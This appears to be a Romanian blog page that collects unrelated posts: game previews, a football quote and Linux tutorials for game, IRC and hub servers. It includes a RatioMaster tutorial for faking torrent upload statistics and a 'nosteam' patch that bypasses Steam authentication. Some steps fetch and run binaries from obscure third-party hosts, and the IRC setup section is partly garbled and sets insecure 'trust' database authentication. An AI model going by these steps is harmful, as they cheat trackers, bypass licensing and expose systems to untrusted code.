V-a plăcut Mafia – jocul? Atmosfera aia de Scorsese, cu povestea exact cum trebuie şi cu gameplay-ul surprinzător de bine închegat? Păi bine atunci, pregătiţi-vă pentru următorul shipment, pentru că Mafia II e aproape gata. La ce să vă aşteptaţi? La lucruri foarte bune, la grafică de zile mari, la aceeaşi poveste savuros de gangsteristă – să nu vă gândiţi că Mafia II o să fie o clonă de GTA IV. Par asemănătoare, dar sunt diferite în câteva puncte esenţiale, după cum veţi constata dacă citiţi instrucţiunile de mai jos.

Povestea o să fie tot un golden classic cu gangsteri

Dacă v-aţi ataşat de povestea din primul joc, mai bine uitaţi-o – oricum orice relaţie între un gamer şi o poveste este sortită unui sfârşit dureros şi cu rejucabilitate redusă. Mafia II o ia de la zero, cu un personaj nou, cu un cazier (aproape) curat. Cutscene-ul de început o spune clar, şi într-un mod foarte clasic: Vito, personajul care va răspunde suspect de prompt apăsării butoanelor de către gamer, deci Vito ăsta coboară dintr-un tren, proaspăt venit în permisie medicală dintr-un WWII care e deja pe sfârşite.
Este întâmpinat nu de clasicul “cousin”, ci de un prieten din copilărie, un tip de-i zice Joe şi care fusese partenerul lui Vito într-ale crimei încă de pe vremea când erau la maternitate şi urlau cât îi ţinea gura la doctori să plătească taxă de protecţie, dar nu-i înţelegea nimeni.
În orice caz, atmosfera şi dialogurile din Mafia II vor fi la fel de autentice – dacă nu mai mult – ca în primul joc. Firul epic principal e unul delicios de clişeistic: doi gangsteri tineri şi ambiţioşi, prieteni la cataramă, care se vârăsc în conflictul dintre două familii rivale. O să auzim multe înjurături, dar nu de genul San Andreas, ci unele amuzante şi, cum să le zic, deştepte.


Realism epic, nu fotorealism rece

Dacă aţi crezut că primul joc vă oferea suficient spaţiu pentru a vă îndeplini quest-urile criminale, apăi acum o să avem de două ori mai mult. De fapt, ca s-o spunem, aşa, concret şi imobiliar, “lumea” din Mafia II o să aibă vreo 5 km pătraţi.

Grand Theft Auto IV


Grand Theft Auto IV este fără nici o îndoială cel mai bun din serie şi unul din cele mai de succes jocuri de pe Playstation 3 şi Xbox 360. Rockstar a confirmat, miercuri, că GTA IV va apărea şi pe PC.

Nico Belic este un est european ce încearcă să îşi facă loc printre gangsterii din Liberty City (un simulacru murdar al New York-ului). GTA IV beneficiază de o grafică mult îmbunătăţită şi o tehnologie care îşi face loc din ce în ce mai des în jocurile de astăzi: Endorphin. Aceasta ajută personajul principal să îşi păstreze o naturaleţe a mişcărilor şi să reacţioneze cât se poate de real în diverse situaţii, cum ar fi accidentele de maşină sau să şchiopăteze ocazional din cauza unei vechi răni de război. Rockstar a confirmat, miercuri, că jocul se va lansa pe PC pe 21 noiembrie şi, prin vocea lui Sam Houser, fondator Rockstar, ne-a asigurat că "jocul arată extraordinar şi se comportă perfect pe PC".

Fifa 2009


FIFA 09 (cunoscut si ca FIFA 2009 sau FIFA Soccer 2009), este noul joc de fotbal din franchiza FIFA, dezvolat de Electronic Arts Canada pentru PC, Xbox 360, PlayStation 3, PlayStation Portable, Nintendo DS, Wii si PlayStation 2 Dezvoltatorii au afirmat ca FIFA 2009 va avea peste 300 de schimbari fata de editia precedenta, pentru a face din edita 2008-2009 cel mai important joc al anului. FIFA 2009 va fi lansat in luna octombrie 2008 si se pare nici in editia din acest an nu vor lipsi de pe coperta Ronaldinho si Wayne Rooney. Printre schimbarile anuntate de dezvoltatori se numara: - Controlul mult imbunatatit si viteza sporita de efectuare a dribblingurilor; - Preluarile mult mai precise


- O noua carcateristica prin care se va putea personaliza AI-ul, pentru a reactiona in functie de setarile jucatorilor si pentru a da o nota de realism echipelor.


Wersiunea Wii a FIFA 2009 va avea pe langa clasicul joc 11 vs 11, un arcade game de 8 vs 8. Cu ajutorul canalului Mii, avatarele 3D vor putea sa-si faca loc in echipa marilor vedete. Se pare ca vor exista si doua mini-games, numite Table Soccer si Boot It.


Becali: "Voi face curatenie la echipa?" Cine pleaca din Ghencea?


Gigi Becali anunta are nevoie de oameni care sa bage mingea in poarta, insa nu are pe cine sa ia din tara. Primii vizati sunt Pepe Moreno si Fabbiani.

Lista neagra se intoarce la Steaua. Becali anunta masuri drastice la echipa din iarna."Sunt si eu idiot ca m-am luat dupa altii la unele transferuri. Voi alege eu varfurile si nu ma mai iau dupa altii. Arthuro nu stie sa joace mingiile din careu decat inapoi, in spate. Sunt mingii cand poti sa te insurubezi, sa faci ceva. Are o manie in a pasa in spate. Si nici n-a pasat bine macar. Nici nu conta daca e vreun coechipier acolo sau nu. Arthuro nu ca nu ar fi jucator de valoare, dar e indolent. Cu Lyon va juca altceva, va juca cu daruire, nu va mai prezenta moda. Dica din cauza neputintei ii cearta pe ceilalti, mai ales pe Dayro. In iarna voi face ceea ce trebuie: curatenie la Steaua.O sa rezolv eu problemele, nu ma mai iau dupa altii" a spus Becali la gsptv.

RatioMaster


Salut In Acest Tutorial O Sa Va Arat Cum Sa Va Mariti Ratia Pe Un Tracker.....
Sa Incepem Ne Trebuie Prima Data RatioMaster Il Puteti Downloada De Aici:
http://www.moofdev.org/ratiomaster/downloads
Deci Dupa ce ati downloadat programul va alegeti un Tracker de Torrent Eu Am Ales www.bittorrents.ro
Acuma Vedem Ca Avem Ratia De:
Inainte:3.846 UL: 6.70 GB DL: 1.74 GB Act: 0 0
Deschidem RatioMaster........Si Modificam Viteza De Upload Si Download.....
La Path:Introducem Fila Torrent......Sper Ca Va Descurcati....Dupa Ce Am Facut Toate Aceste Setari.....
Ii Dam Start.......Si Asteptam......Eu Astept Doar Cateva Secunde Ca Sa Vedeti Ca A Crescut Ratia Dar Voi
Puteti Astepta Mai Mult.........
Si Ratia Dupa:3.988 UL: 6.90 GB DL: 1.85 GB Act: 0 0

Invata sa instalezi server de CS

Tutorial instalare server CS 1.6 nosteam pe Linux:

Introducere 
Ce avem nevoie pentru a face un server de 1.6 pe linux? 
- un calculator cu linux pe el sau access pe ssh 
- root privileges 
- o conexiune la internet (viteza cel putin 100kB/s metro si extern) prin FIBRA OPTICA. Abonamentele de gen RDS CableLink sau Astral AIpA NU SUNT RECOMANDATE. Daca aveti asemenea abonament, mai mult de 5 oameni n-o sa puteti tine pe server iar pingurile vor sari de la 10 la 100 si tot asa pentru simplul motiv ca viteza NU ESTE GARANTATA la aceste abonamente. 
- 1-2 GB spatiu pe disc 
- wget, screen si un text editor (pico, nano sau mcedit) 

Descarcarea fisierelor 
Intai si intai trebuie sa facem un director in care vom lucra 
Code: 
mkdir /usr/hlds 
cd /usr/hlds 

Apoi trebuiesc downloadate urmatoarele: 
- HldsUpdateTool 
Code: 
wget http://www.steampowered.com/download/hldsupdatetool.bin 

- NoSteamAuthEngines 

MiRROR1 - THX inVIDIA:Code: 
wget http://zoneart.trei.ro/engine.v15.tgz 

- AdminMod + MetaMod 
Code: 
wget http://ovh.dl.sourceforge.net/sourcefor ... nux.tar.gz 

- StatsMe 
Code: 
wget http://ovh.dl.sourceforge.net/sourcefor ... strike.zip 


Instalarea serverului 
1. Daca ati urmat pasii pana aici, trebuie sa fiti in /usr/hlds si sa aveti downloadate fisierele de mai sus in acest director. Sa incepem cu hldsupdatetool.bin 
Code: 
chmod +x hldsupdatetool.bin 
./hldsupdatetool.bin 

Comenzile date mai sus ar trebui sa rezulte un nou fisier numit steam 
2. Sa incepem instalarea serverului: 
Code: 
./steam -command update -game valve -dir . 

Exista posibilitatea sa isi faca un update, dupa care sa va cere sa executati comanda de mai sus din nou. Nu-i nimic, apasati sageata sus si enter. In functie de viteza conexiunii, acesta operatiune poate dura de la cateva minute, la cateva ore si se va termina cu mesajul HLDS installation up to date 
3. Instalarea mod-ului (in cazul nostru counterstrike) 
Code: 
./steam -command update -game cstrike -dir . 

Din nou, in functie de viteza conexiunii, poate dura de la cateva minute, la cateva ore si se va termina cu mesajul HLDS installation up to date 

Patch-uirea serverului pentru a accepta clienti NOSTEAM 
Aceasta se face prin comenzile: 
Code: 
rm -rf engine_amd.so 
rm -rf engine_i486.so 
rm -rf engine_i686.so 
tar xfvz engine.v15.tgz 


server.cfg 
In directorul /usr/hlds/cstrike avem un fisier server.cfg pe care il deschidem cu pico, nano, mcedit, vi sau ce aveti pe acolo 
Aici stergem TOT ce este scris si adaugam urmatoarele cvars-uri: 
Code: 
hostname "Numele Serverului" 
mp_autokick 0 
mp_autocrosshair 0 
mp_autoteambalance 0 
mp_buytime 2 
mp_consistency 1 
mp_c4timer 35 
mp_fadetoblack 0 
mp_falldamage 0 
mp_flashlight 1 
mp_forcecamera 3 
mp_forcechasecam 2 
mp_friendlyfire 1 
mp_freezetime 3 
mp_fraglimit 0 
mp_hostagepenalty 0 
mp_limitteams 6 
mp_logfile 1 
mp_logmessages 1 
mp_logdetail 3 
mp_maxrounds 0 
mp_playerid 0 
mp_roundtime 3 
mp_startmoney 800 
mp_timelimit 35 
mp_tkpunish 0 
mp_winlimit 0 

sv_aim 0 
sv_airaccelerate 10 
sv_airmove 1 
sv_allowdownload 1 
sv_clienttrace 1.0 
sv_clipmode 0 
sv_allowupload 1 
sv_cheats 0 
sv_gravity 800 
sv_lan 1 
sv_maxrate 7000 
sv_maxspeed 320 
sv_maxupdaterate 101 
sys_ticrate 10000 
decalfrequency 60 
pausable 0 
log on 
decalfrequency 60 
edgefriction 2 
host_framerate 0 
exec listip.cfg 
exec banned.cfg 
rcon_password PAROLA 

la putem scrie orice. De ex. "Pufuletz CS 1.6 Server". Ce scriem aici, le apare jucatorilor sus cand apasa TAB. Mai departe, la trecem o parola cu care vom putea controla serverul de la distanta. In rest, nu schimbati nimic decat daca stiti exact despre ce e vorba. 

Instalare AdminMod 
Am downloadat mai devreme halflife-admin-2.50.60-linux.tar.gz pe care il extractam oriunde. 
Code: 
tar xfvz halflife-admin-2.50.60-linux.tar.gz 

Vom avea un director nou numit Adminmod. De aici efectuam comenzile: 
Code: 
cd Adminmod 
./install_admin 

Va aparea prima intrebare la care raspundem cu yes (apasam Y si enter) 
Mai departe, ne va intreba care este directorul default de instalare al hlds. Raspundem cu /usr/hlds si enter. Apoi va trebui sa alegem mod-ul pentru care dorim instalarea adminmod-ului. Tastam 1 si enter. Apoi Y si enter la urmatoarele doua intrebari si aia a fost. 

Configurare minima pentru AdminMod 
Mergem in directorul /usr/hlds/cstrike/addons/adminmod/config 
Code: 
cd /usr/hlds/cstrike/addons/adminmod/config/ 

. Aici avem cateva fisiere ce necesita atentia noastra. Incepem cu adminmod.cfg pe care il deschidem cu pico, nano sau mcedit. 
Code: 
nano adminmod.cfg 

Chiar daca sunt explicate fiecare in parte, voi incerca sa va explic si eu, pe scurt ce fac cateva din ele. 
admin_balance_teams - nu ne intereseaza, il lasam 0 
admin_bot_protection - daca este setat 0 si rulam un server cu boti, aceast cvar lasa adminii sa dea slay, kick, ban etc botilor. 
admin_connect_msg - acesta este mesajul ce apare unui jucator in mijlocul ecranului dupa ce s-a conectat. 
admin_cs_restrict - il punem de preferat 1 pentru a putea restrictiona armele in joc. (anti-apasaci) 
admin_debug - n-avem treaba, il lasam 0 
admin_fun_mode - de preferat il lasam 0. Acest cvar e pentru a face jucatorii sa straluceasca intr-o culoare (glow blue). 
admin_fx - il punem 1. Efecte speciale. 
admin_gag_name - 0 sau 1 in functie de preferinta. 
admin_gag_sayteam - la fel. 
admin_highlander - Ar trebui lasat 0. Daca il trecem 1, doar un singur admin, cel mai mare, va avea access la comenzi. De ex daca pe server sunt 3 admini, cel mai mare ramane, iar celati 2 raman simple sloturi. 
admin_ignore_immunity - Aici depinde de gusturi. Daca e pus 1, adminii, moderatorii si ceilalti jucatori cu imunitate isi pot da/lua slay-uri, kick, ban etc intre ei. 
admin_repeat_msg - Un mesaj ce apare cu verde in mijlocul ecranului o data la cateva minute. 
admin_quiet - Daca trecem 0, comenzile date de admin vor aparea cu tot cu nickul lui. Daca trecem 1, comenzile vor aparea dar in locul nickului adminului va aparea doar "Admin" iar daca trecem 2, comenzile nu vor aparea deloc. 
allow_client_exec - Neaparat 1 ! Cu asta putem obliga jucatorii sa execute orice comanda (quit etc) 
password_field - Poate cel mai important cvar. Ce trecem aici, vor trebui adminii nostri sa scrie in consola inainte de a se conecta la server. De ex. daca punem _parola, adminul gigi cu parola gigi123 va trebuie sa scrie in consola name gigi si apoi setinfo _parola gigi123 inainte de a se conecta la serverul nostru. 
reserve_slots - Aici trecem cate locuri rezervate are serverul. Treceti in jur de 2-3. Asta lasa adminii si sloturile rezervate sa se poata conecta atunci cand serverul este plin. 
reserve_type - Lasati 0. E cel mai bine. Daca sunteti curiosi ce face, cititi manualul adminmod-ului. 

Veti observa ca unele variabile nu le-am trecut. Asta inseamna ca e recomandat sa le lasati asa cum sunt. 

Cum adaugam/stergem admini 
Deschidem cu pico, nano sau mcedit users.ini. Aici trecem numele adminilor si parolele lor, urmate de accesul pe server. Sa zicem ca vrem sa facem un admin cu access maxim pe numele gigi si parola gigi123. Trecem in users.ini aceasta linie: 
Code: 
gigi:gigi123:131071 

Pentru nivele de access custom, mergeti la http://www.adminmod.org/help/online/Adm ... mmands.htm si selectati ce comenzi vreti sa adaugati adminului. Apoi apasati "calculate access right" iar numarul ce rezulta, il treceti in user.ini dupa numele si parola adminului. Exact ca in exemplul cu gigi, numai ca inlocuim 131071 cu numarul rezultat. Ca o mica paranteza, liniile cu admini vor fi una sub alta si nu consecutive. 

StatsMe 
Am downloadat mai devreme statsme-2.8.3-cstrike.zip care trebuie extractat in directorul cstrike. Aceasta se face prin comenzile: 
Code: 
cd /usr/hlds/cstrike 
unzip statsme-2.8.3-cstrike.zip 

Intai si intai, mergem in /usr/hlds/cstrike/addons/metamod si deschidem plugins.ini cu pico, nano sau mcedit. Aici adaugam urmatoarea linie deasupra altora deja existente: 
Code: 
linux addons/statsme/dlls/statsme_mm_i386.so 

Apoi mergem in /usr/hlds/cstrike/addons/statsme si deschidem statsme.cfg cu pico, nano sau mcedit. La sm_menupassword modificam r3wt cu o alta parola. Neaparat trebuie modificata parola altfel nu vor merge niste chestii. Apoi cand vom intra in joc, vom scrie in consola statsme_menu parola-trecuta-in-statsme.cfg pentru a modifica ultimele setari. 

Ca sa mearga /rank si /top10 
Trebuie sa deschideti acelasi statsme.cfg iar la sm_storebyauth sa puneti 0 

Secure server 
Este de preferat sa avem un server ne-secure din mai multe motive. Ca sa facem asta, trebuie sa mergem in directorul /usr/hlds/cstrike si sa deschidem liblist.gam cu pico, nano sau mcedit. Acolo vom modifica secure "1" cu secure "0". 

Pornirea serverului 
Mergem in directorul /usr/hlds si executam comanda: 
Code: 
./hlds_run -game cstrike +ip ip.de.internet +sv_lan 1 -nomaster +maxplayers 18 +map de_dust2 


Pentru a porni serverul in screen, folosim comanda: 
Code: 
screen -A -m -d -S hlds ./hlds_run -game cstrike +ip ip.de.internet +sv_lan 1 -nomaster +maxplayers 18 +map de_dust2 

Aceasta comanda, lanseaza serverul in background. Pentru a ne atasa din nou la el, scriem 
Code: 
screen -r hlds 

Pentru a il trimite din nou in background, tinem apasat tasta Ctrl, apasam tasta A, tinem apasat si apoi apasam tasta D. 

Pentru ca serverul de cs sa porneasca la fiecare boot al serverului de linux, trebuie sa adaugam urmatoarele linii in /etc/rc.local 
Code: 
cd /usr/hlds 
screen -A -m -d -S hlds ./hlds_run -game cstrike +ip ip.de.internet +sv_lan 1 -nomaster +maxplayers 18 +map de_dust2 



Plugin-ul pentru admin_who 
oricine pe server poate folosi comanda admin_who care ii va arata adminii pe server dupa cum urmeaza: 
Moderatori 
cei cu acces maxim (admin_rcon admin_exec* alea alea) 
Administratori 
ce cu access la orice, inafara de admin_rcon, admin_exec* 
Helperi 
cei cu access la orice, inafara de admin_rcon si admin_ban ! 
Sloturi 
cei cu nume rezervat si/sau slot rezervat. 

Downloadati acest plugin si il puneti in cstrike/addons/adminmod/scripts dupa care adaugati linia in cstrike/addons/adminmod/config/plugins.ini 
addons/adminmod/scripts/admin_who.amx

Instalare servere irc

Aici puteti invata cum sa instalati GNUWorld & IrcU & Beware IRcd

 Install GNUWorld:

Installing GNUWorld On RedHat, Mandrake, Suse, Debian, etc.


# /usr/bin/updatedb 
# locate tclConfig.sh 
# grep TCL_VERSION /usr/lib/tclConfig.sh 
wget http://www.phlander.as.ro/tcl8.3.4.tar.gz 
# tar -xzf tcl8.3.4.tar.gz 
# cd tcl8.3.4/unix/ 
# ./configure 
# make 
# make install wget http://cesnet.dl.sourceforge.net/source ... 2.4.tar.gz
# tar -xzf postgresql-7.2.4.tar.gz 
# cd postgresql-7.2.4/ 
# ./configure --with-CXX --with-tcl --without-tk 
# gmake 
# gmake install pico /etc/ld.so.conf and add the following line : /usr/local/pgsql/lib *** save the file, then run : 
# ldconfig *** To check that your PostreSQL installation includes TCL support, check that the following file exists onto your system : 
# /usr/local/pgsql/bin/pgtclsh *** Add a User & Creating GNUWorld: 
# adduser gnuworld 
# mkdir /usr/local/pgsql/data 
# chown gnuworld /usr/local/pgsql/data 
# su - gnuworld $ /usr/local/pgsql/bin/initdb -D /usr/local/pgsql/data *** Then run PostgreSQL : $ /usr/local/pgsql/bin/pg_ctl -D /usr/local/pgsql/data -m smart stop $ /usr/local/pgsql/bin/postmaster -SiD /usr/local/pgsql/data ( pentru conectarea pe ip ) $ /usr/local/pgsql/bin/postmaster -S -B 64 -N 32 -i -D /usr/local/pgsql/data -o -F -h 127.0.0.1 ps auxw | grep postmaster Daca este nevoie de gcc : wget http://www.phlander.as.ro/gcc-2.95.3.tar.gz 
# tar -zxf gcc-2.95.3.tar.gz 
# cd gcc-2.95.3 
# ./configure 
# make 
# make install 
# su - gnuworld *** To Download The Gnuworld $ cvs E-mail login *** Type as password $ cvs -z3 -d E-mail co gnuworld $ cvs -z3 -d E-mail co website 
# cd gnuworld/ 
# ./configure --enable-modules=cservice,ccontrol or 
# ./configure --disable-static 
# gmake 
# gmake install 
# cd .. $ cd gnuworld/doc/ 
# /usr/local/pgsql/bin/createdb cservice 
# /usr/local/pgsql/bin/createlang plpgsql cservice -L /usr/local/pgsql/lib or # /usr/local/pgsql/bin/createlang -L /usr/local/pgsql/lib plpgsql cservice # /usr/local/pgsql/bin/psql cservice < cservice.sql $ /usr/local/pgsql/bin/psql cservice < languages.sql 
# /usr/local/pgsql/bin/psql cservice < language_table.sql 
# /usr/local/pgsql/bin/psql cservice < greeting.sql 
# /usr/local/pgsql/bin/psql cservice < cservice.help.sql 
# /usr/local/pgsql/bin/psql cservice < cservice.web.sql # /usr/local/pgsql/bin/createdb local_db 
# /usr/local/pgsql/bin/psql local_db < local_db.sql 
# /usr/local/pgsql/bin/psql cservice < cservice.addme.sql # /usr/local/pgsql/bin/createdb ccontrol 
# /usr/local/pgsql/bin/psql ccontrol < ccontrol.sql 
# /usr/local/pgsql/bin/psql ccontrol < ccontrol.help.sql 
# /usr/local/pgsql/bin/psql ccontrol < ccontrol.addme.sql 
# /usr/local/pgsql/bin/psql ccontrol < ccontrol.commands.sql 
# cd ../bin *** Edit the config files then run 
# /usr/local/pgsql/bin/psql cservice cservice=
# update pg_shadow set passwd='passwd' where usename='gnuworld'; pico /usr/local/pgsql/data/pg_hba.conf 
host all 127.0.0.1 255.255.255.255 trust 
host all 127.0.0.1 255.255.255.255 crypt 
# /usr/local/pgsql/bin/pg_ctl -D /usr/local/pgsql/data restart 
# cd gnuworld/bin/ 
# ./gnuworld -c -f GNUWorld.conf & 
# cd ../../website/php_includes/ pico /home/gnuworld/website/php_includes/config.inc $ exit 
# cd /home/gnuworld/gnuworld/doc/cmaster/ 
# cp -rp regproc/ /usr/local/pgsql/ 
# chown -R gnuworld /usr/local/pgsql/regproc/ 
# su - gnuworld pico /usr/local/pgsql/regproc/appjudge-config 
# Number of days an application has to pass the activity test set MAX_DAYS 99 
# Number of unique IP's that must visit a channel during the activity test set UNIQUE_JOINS 99 
# Number of supporters that must visit the channel during the activity test set MIN_SUPPORTERS 99 
# Duration of the notify period set NOTIFY_DAYS 99 
# Number of days supporters have to confirm their support set SUPPORT_DAYS 99 
# chmod 755 /usr/local/pgsql/regproc/appjudge 
# crontab /usr/local/pgsql/regproc/cron-judge.in 
3 exit *** Setting up Apache and PHP 
# wget http://www.phlander.as.ro/apache_1.3.27.tar.gz wget http://www.phlander.as.ro/php-4.2.3.tar.gz tar -xzf apache_1.3.27.
tar.gz tar -xzf php-4.2.3.tar.gz 
# cd apache_1.3.27/ 
# ./configure --prefix=/usr/local/apache 
# cd ../php-4.2.3/ 
# ./configure --with-pgsql=/usr/local/pgsql --enable-track-vars --with apache=../apache_1.3.27 
# make 
# make install 
# cd ../apache_1.3.27/ 
# ./configure --prefix=/usr/local/apache --activate module=src/modules/php4/libphp4.a 
# make 
# make install 
# cd ../php-4.2.3/ 
# cp php.ini-dist /usr/local/lib/php.ini 
# pico /usr/local/lib/php.ini 
# cd /usr/local/apache/htdocs/ 
# chmod 711 ~gnuworld 
# chmod 711 ~gnuworld/website 
# chmod 755 ~gnuworld/website/php_includes 
# chmod 644 ~gnuworld/website/php_includes/config.inc 
# chmod 755 ~gnuworld/website/docs/gnuworld/ 
# ln -s /home/gnuworld/website/docs/gnuworld live pico /usr/local/apache/conf/httpd.conf *** Find: DirectoryIndex index.html *** and replace by : IfModule mod_dir.c *** then find (look for example for 'AddType') : 
# And for PHP 4.x, use: 

# AddType application/x-httpd-php .php 
# AddType application/x-httpd-php-source .phps *** and replace by : (if you haven't found the lines above, add them in the file then) 
# And for PHP 4.x, use: 
# AddType application/x-httpd-php .php 
# AddType application/x-httpd-php-source .phps 
# ../bin/apachectl start 
# /usr/local/apache/bin/apachectl restart

Instalare...slack11 kernel 2.6.17-x ) & bootsplash:

Asta e un tutorial pt inst la ceva

Instalare bootsplash pt kernel 2.6.x de la slackware
Eu am instlat acest bootsplash pe kernel 2.6.17.13-smp si functioneaza fara nici o problema.

[~] Instalam bootsplash programu.

$ cd /tmp
$ wget http://ftp.scarlet.be/pub/linuxpackages ... 6-2kta.tgz
$ installpkg bootsplash-11.0-i486-2kta.tgz
$ rm -rf bootsplash-11.0-i486-2kta.tgz

in cazul in care folositi slapt-get puteti sa il instalati :

$ slapt-get install bootsplash

[~] Facem patch la kenel.

$ cd /root

sau

$ cd ~

Acuma facem wget si instalam patch pentru kernel.

$ wget ftp://ftp.openbios.org/pub/bootsplash/k ... .6.15.diff
$ cd /usr/src/linux-2.6.x ( ex: cd /usr/src/linux-2.6.17.13/ )
$ patch -p1
Acuma recompilam kernelu cu suppot de bootsplash.

$ make menuconfig

Setarile din kernel trebuie facut asa :

Under Device Drivers > Block Devices

RAM disk
[*] Initial RAM filesystem and RAM disk (initramfs/initrd) support

Under Device Drivers > Graphics Support

Support for frame buffer devices
[*] VESA VGA graphics support
[*] Video mode selection support
Framebuffer Console support
[*] Select compiled-in fonts
[*] VGA 8x8 font
[*] VGA 8x16 font
[M]Logo configuration
[ ] Bootup logo (Il dezactivam)
[*] Bootup splash screen

Salvam setarile facute si recompilam kernelu

$ make ; make install ; make modules_install

Dupa ce este recompilat kernelu

$ /sbin/depmod -ae -F System.map
$ cp /arch/i386/boot/bzImage /boot/vmlinuz

[~] Acuma facem initrd de boot splash

$ /sbin/splash -s -f /etc/bootsplash/themes/Linux/config/bootsplash-1024�768.cfg >> /boot/initrd.splash
acesta este doar un exemplu, modificati comanda dupa themesu dumneavoastra
[~] Acuma mai trebe editat in /etc/lilo.conf

$ pico /etc/lilo.conf

la linix cu vga trbe sa fie vga = 791
[*] Sunt 2 exemple primu este bootsplash normal iar al doilea bootsplash cu slient.

[!] Primu exemplu cu bootsplash normal.
# VESA framebuffer console
vga = 791
# Linux with bootsplash
image = /boot/vmlinuz
root = /dev/hda4
label = Slacware
initrd = /boot/initrd.Linux
read-only
# End of linux with bootsplash

[!] Al doilea exemplu cu bootsplash slient.
# VESA framebuffer console
vga = 791
# Linux with bootsplash
image = /boot/vmlinuz
root = /dev/hda4
label = Slacware
initrd = /boot/initrd.Linux
append=splash=silent
read-only
# End of linux with bootsplash

Dupa accea salvezi lilo.conf si ca sa fi sigur ca nu o sa ai nici o eroare la bootloader folosesti urmatoarea comanda

$ /sbin/lilo

[!] Exemplu
root:~> /sbin/lilo
Added Slacware *
root:~>
Daca ai un raspuns aseamantor cu acesta insemna ca lilo va reporni fara nici o eroare.

Install Beware IrcD:

wget www.hacktrade.internet-caffe.net/bircd.tar.tar
tar zxvf bircd.tar.tar
cd bircd
pico ircd.conf
pico bircd.ini
pico ircd.motd 
chmod +x *
./bircd

As recomanda ca editarea fisierelor ( ircd.conf, bircd.ini, ircd.motd ) sa o faceti cu programul WinScP

/s -m ip-ul rutului 6667 ( /s -m 196.100.111.222 6667 )

Daca rutul nu are portul 6667 deschis nu puteti sa va conectati la server si trebuie sa ii deschideti portul prin comenzile:

1. /sbin/iptables -I INPUT -p tcp --dport 6667 -j ACCEPT
2. iptables -I INPUT -p tcp --dport 6667 -j ACCEPT

Puteti sa deschideti si alte porturi pentru serverul IRC cum ar fii: 6669,6666,6660,7000,6665.

 Install VerliHub:

Pachete necesare 

1.1 - MySQL 
1.2 - pcre 
1.3 - GeoIP 
2. download 
3. compilare 
3.1 - compilare & instalare 
3.2 - numai compilare 
4. configurare si startare verlihub 
4.1 - ca daemon 
4.2 - normal 

1. Pachete necesare 

Pentru a putea compial verlihub aveti nevoie de 

1.1 MySQL 

Daca nu aveti instalat MySQL, puteti downloada de la http://www.linuxpackages.net o versiune de MySQL, instaland-o cu pkgtool , sau pkginstall 

1.2 pcre 

Distributia slackware vine cu acest pachet din default, daca nu il aveti puteti downloada de la http://www.linuxpackages.net o versiune de pcre, instaland-o cu pkgtool , sau pkginstall. 

1.3 GeoIP

wget http://opensys.linuxpackages.net/Slackw ... 6-2dst.tgz

Instalarea se va face cu comanda: 

installpkg geoip-1.3.6-i486-2dst.tgz 

2. Download verlihub 

De la aceasta adresa puteti downloada verlihub : http://sourceforge.net/projects/verlihub/ , sau o puteti lua si prin cvs , cu comenzile: 

cvs -z1 E-mail login
cvs -z1 E-mail co verlihub 

In caz ca cere o parola , apasati enter, deoarece nu exista nici o parola. 

Prima comanda va returna: 

E-mail:~# cvs -z1 E-mail login
Logging in to E-mail
CVS password:
cvs login: warning: failed to open /root/.cvspass for reading: No such file or directory 

A 2-a comanda :

E-mail:~# cvs -z1 E-mail co verlihub
cvs checkout: Updating verlihub
U verlihub/AUTHORS
U verlihub/BUGS
U verlihub/COPYING
U verlihub/ChangeLog
U verlihub/INSTALL
U verlihub/LuaPlugin.dev
U verlihub/Makefile.am
U verlihub/Makefile.cvs
U verlihub/Makefile.in
U verlihub/Makefile.win
U verlihub/NEWS
U verlihub/README
U verlihub/TODO
U verlihub/acinclude.m4
U verlihub/aclocal.m4
U verlihub/config.guess
U verlihub/config.h.in
U verlihub/config.sub
U verlihub/config_geoip
U verlihub/configure
U verlihub/configure.in
U verlihub/depcomp
U verlihub/install-sh
U verlihub/ltconfig
U verlihub/ltmain.sh
U verlihub/missing
U verlihub/mkinstalldirs
U verlihub/noapos
U verlihub/noapos_mysql
U verlihub/noapos_pcre
U verlihub/stamp-h
U verlihub/stamp-h.in
U verlihub/verlihub.dev
U verlihub/verlihub.dsp
U verlihub/verlihub.dsw
U verlihub/verlihub.spec.in
U verlihub/verlihub_config.in
U verlihub/verlihubdll.dev
cvs checkout: Updating verlihub/docs
U verlihub/docs/.cvsignore
U verlihub/docs/Makefile.am
U verlihub/docs/Makefile.in
U verlihub/docs/WIN_INSTALL.txt
U verlihub/docs/ascii
U verlihub/docs/configuring.txt
U verlihub/docs/features.html
U verlihub/docs/help
U verlihub/docs/help.html
U verlihub/docs/help.sql
U verlihub/docs/params.php
U verlihub/docs/plugins_devel.html
U verlihub/docs/protocol.dia
U verlihub/docs/setuphelp.sql
U verlihub/docs/using.txt
U verlihub/docs/verlihub.html
cvs checkout: Updating verlihub/docs/html_docs
cvs checkout: Updating verlihub/docs/html_manual
U verlihub/docs/html_manual/verlihub.css
U verlihub/docs/html_manual/verlihub_manual.html
cvs checkout: Updating verlihub/docs/pdf_manual
U verlihub/docs/pdf_manual/verlihub_manual.pdf
cvs checkout: Updating verlihub/html_docs
cvs checkout: Updating verlihub/html_docs/verlihub_files
cvs checkout: Updating verlihub/lib
U verlihub/lib/Makefile.am
U verlihub/lib/Makefile.in
U verlihub/lib/libverlihub.cpp
cvs checkout: Updating verlihub/plugins
U verlihub/plugins/Makefile.am
U verlihub/plugins/Makefile.in
cvs checkout: Updating verlihub/plugins/diakritika
U verlihub/plugins/diakritika/Makefile.am
U verlihub/plugins/diakritika/Makefile.in
U verlihub/plugins/diakritika/README
U verlihub/plugins/diakritika/cdiacfg.cpp
U verlihub/plugins/diakritika/cdiacfg.h
U verlihub/plugins/diakritika/cpidia.cpp
U verlihub/plugins/diakritika/cpidia.h
cvs checkout: Updating verlihub/plugins/hublink
cvs checkout: Updating verlihub/plugins/lua
U verlihub/plugins/lua/cLua.h
U verlihub/plugins/lua/dll.h
U verlihub/plugins/lua/dllmain.cpp
cvs checkout: Updating verlihub/plugins/perl
cvs checkout: Updating verlihub/plugins/perl/docs
cvs checkout: Updating verlihub/plugins/plugman
U verlihub/plugins/plugman/Makefile.am
U verlihub/plugins/plugman/Makefile.in
U verlihub/plugins/plugman/cconsole.cpp
U verlihub/plugins/plugman/cconsole.h
U verlihub/plugins/plugman/cpiplug.cpp
U verlihub/plugins/plugman/cpiplug.h
U verlihub/plugins/plugman/cplugs.cpp
U verlihub/plugins/plugman/cplugs.h
cvs checkout: Updating verlihub/plugins/test
U verlihub/plugins/test/Makefile.am
U verlihub/plugins/test/Makefile.in
U verlihub/plugins/test/cpitest.cpp
U verlihub/plugins/test/cpitest.h
cvs checkout: Updating verlihub/scripts
U verlihub/scripts/Makefile.am
U verlihub/scripts/Makefile.in
